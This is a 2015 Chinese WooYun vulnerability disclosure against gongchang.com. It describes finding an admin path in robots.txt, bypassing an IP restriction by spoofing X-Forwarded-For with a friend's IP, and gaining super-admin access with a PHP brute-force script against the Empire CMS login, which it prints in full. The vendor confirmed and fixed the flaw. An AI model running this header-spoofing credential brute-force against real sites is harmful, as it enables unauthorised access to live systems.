世界工厂网某系统弱口令,突破ip限制 | wooyun-2015-0107414| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107414

漏洞标题：世界工厂网某系统弱口令,突破ip限制

漏洞作者：路人甲

提交时间：2015-04-13 10:15

修复时间：2015-04-15 08:41

公开时间：2015-04-15 08:41

漏洞类型：网络敏感信息泄漏

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-13：细节已通知厂商并且等待厂商处理中
2015-04-13：厂商已经确认，细节仅向厂商公开
2015-04-15：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

一朋友到这家公司去工作了,送他一个礼物
第一次来wooyun啊,类型选错了帮改改,谢谢
就登录进去后嘛都没干- -#怕朋友吵我

详细说明：

首先从www.gongchang.com主站入手
在http://www.gongchang.com/robots.txt中泄漏了一个后台路径

Robots.txt
User-agent: *
Disallow: /d/
Disallow: /e/engongchang_admin/

打开http://www.gongchang.com/e/engongchang_admin/

是帝国6.0的后台,这个版本中有不少漏洞但都是后台登录后能执行的,因为我没找到这个系统的前台页面和帝国有什么关系!
随便扔进去个密码
username=123
password=123
显示
Ip(8.8.8.8) be prohibited.
刚好用的是firefox装了x-forward插件ip设置的是8.8.8.8
既然ip获取的是x-forward-for那就伪装ip吧
打开QQ,给朋友发了个gif图片,ip就看到了(对不住了...)

1.192.121.217

果然

信息提示
您的用户名与密码有误，也可能您的帐号已被禁用，请重输
如果您的浏览器没有自动跳转，请点击这里

不再显示IP不被允许了
这时候我跑了admin弱口令一堆没辙了...
忽然想起来朋友给我发的一个国内不翻墙上google的方法的链接
http://team.xizhi.com/thread-3162-1-1.html
是他公司的交流论坛,但它是开放的,顿时用户名有了,
总结了下上面出现的名字,结合js脚本跳转,写了个脚本,挂上弱口令跑下

<?php   
set_time_limit(0);
function http($user,$pass){
    $url = 'http://www.gongchang.com/e/engongchang_admin/ecmsadmin.php';  
    $header = array(
        'CLIENT-IP:1.192.121.217', 
        'X-FORWARDED-FOR:1.192.121.217', 
    );
    $data = array('username'=>$user,'password'=>$pass,'enews'=>'login','adminwindow'=>0,'imageField.x'=>46,'imageField.y'=>14);
    $curl = curl_init();
    curl_setopt ( $curl, CURLOPT_POST, 1 );
    curl_setopt($curl,CURLOPT_HTTPHEADER,$header);
    curl_setopt($curl,CURLOPT_URL,$url);
    curl_setopt($curl,CURLOPT_TIMEOUT,5);  
    curl_setopt ($curl, CURLOPT_POSTFIELDS, $data);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    $r = curl_exec($curl);
    curl_close($curl);
    return $r;
}
$unames = array('王兰兰','刘建辉','李方超','孟伟','文帅营','闫艳利','金宏威','彭东江','王文官');
$pfile = './pass.txt';
$file = fopen($pfile,'r+');
foreach($unames as $v){
    while($f = fgets($file))
    {
        $res = http($v,trim($f));
        $len = strpos($res,'\'admin.php');
        if($len){
            fclose($file);
            print_r('user:'.$v.'_pass:'.$f);die;
        }
    }
}
fclose($file);

结果第一个就跑出来了

超级管理员权限,

如果朋友知道了这个...一定会说这个站安全上惨不忍睹,因为我的站就被他这么说过!

漏洞证明：

如上

修复方案：

ip限制严格些
弱口令改改
升级帝国,否则getshell很轻松

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-04-13 10:22

厂商回复：

感谢，稍后修复

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107414

漏洞标题：世界工厂网某系统弱口令,突破ip限制

相关厂商：世界工厂网

漏洞作者：路人甲

提交时间：2015-04-13 10:15

修复时间：2015-04-15 08:41

公开时间：2015-04-15 08:41

漏洞类型：网络敏感信息泄漏

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0107414

漏洞标题：世界工厂网某系统弱口令,突破ip限制

相关厂商：世界工厂网

漏洞作者： 路人甲

提交时间：2015-04-13 10:15

修复时间：2015-04-15 08:41

公开时间：2015-04-15 08:41

漏洞类型：网络敏感信息泄漏

危害等级：中

自评Rank：10

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0107414"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云